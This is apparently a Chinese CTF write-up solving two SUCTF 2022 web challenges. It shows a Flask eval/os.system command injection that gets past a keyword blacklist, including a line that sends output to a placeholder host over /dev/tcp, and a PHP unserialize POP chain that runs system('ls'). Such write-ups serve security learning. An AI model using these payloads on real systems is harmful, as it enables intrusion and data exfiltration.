calc
给了源码
app=Flask(__name__)
def waf(s):blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']flag = Truefor no in blacklist:if no.lower() in s.lower():flag= Falseprint(no)breakreturn flag@app.route("/")
def index():"欢迎来到SUctf2022"return render_template("index.html")
@app.route("/calc",methods=['GET'])
def calc():ip = request.remote_addrnum = request.values.get("num")log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)if waf(num):try:data = eval(num)os.system(log)except:passreturn str(data)else:return "waf!!"if __name__ == "__main__":app.run(host='0.0.0.0',port=5000)
简单看一下,黑名单过滤关键字符,括号都被过滤了,本想试着命令执行,看来行不通,何况过滤了这么多
思路:传系统命令到log,利用os.system去执行
需要注意将num后用#去注释
payload
1#`ls`
之后外带/tmp/log.txt数据即可
另一种方法,思路:
1.三个单引号闭合起来的地方会当作字符串处理
2.单引号闭合过滤后面内容
3.#过滤
payload
'''2'
ls> /dev/tcp/x.x.x.x/port
#'3'''> ./tmp/log.txt
换行因为过滤了空格,用换行符绕过
ezpop
<?php
class crow
{public $v1;public $v2;function eval() {echo new $this->v1($this->v2);}public function __invoke(){$this->v1->world();}
}
class fin
{public $f1;public function __destruct(){echo $this->f1 . '114514';}public function run(){($this->f1)();}public function __call($a, $b){echo $this->f1->get_flag();}
}
class what
{public $a;public function __toString(){$this->a->run();return 'hello';}
}
class mix
{public $m1;public function run(){($this->m1)();}public function get_flag(){eval('#' . $this->m1);}
}
if (isset($_POST['cmd'])) {unserialize($_POST['cmd']);
} else {highlight_file(__FILE__);
}
入口__destruct
f1=new what();
__toString中run()方法,两个类中都有
这里用mix中的run方法,然后crow里的__invoke到fin里的__call到mix里的get_flag
payload
<?php
class crow
{public $v1;public $v2;public function __construct($v1){$this->v1 = $v1;}
}class fin
{public $f1;public function __construct($f1){$this->f1 = $f1;}
}class what
{public $a;public function __construct($a){$this->a = $a;}
}
class mix
{public $m1;public function __construct($m1){$this->m1 = $m1;}}$f = new mix("\nsystem('ls');");
$e = new fin($f);
$d = new crow($e);
$c = new mix($d);
$b = new what($c);
$a = new fin($b);
echo urlencode(serialize($a));
flag
flag{4d206c55-632f-430c-aeda-e60019260889}
not here, but it's close, think more.not here, but it's close, think more.not here, but it's close, think more.not here, but you are almost getting the flag!<?php